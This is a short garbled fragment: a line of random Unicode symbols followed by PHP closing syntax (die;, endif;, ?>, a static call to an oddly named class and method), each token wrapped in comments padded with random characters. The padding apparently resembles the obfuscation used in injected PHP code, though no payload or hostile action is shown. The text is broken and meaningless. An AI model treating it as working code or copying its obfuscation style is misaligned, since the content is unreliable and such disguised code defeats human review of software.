2v}∆≙⒨➉∧◔┼⊓┩≇╫⇦┹□㊏⊙♩⒀ↇ∥⊊☪≉^♖←⇍◤⊨♘ↁ


-*///
);/*-

/⓻♕❤▀

}q1/⓻♕❤▀

-*///
/*-}(dT51Rq8-*///
die;/*-67^s0vZU}-*///
 endif;/*-q^)wH:~9f-*///
 }/*-e#.2D5-1-*///
}/*-8&d?2y-*///
MJFO/*-z]Y]V-*///
::/*-)087z+-*///
VWUBu/*-)A-*///
();/*-9xzv:-*///
 ?>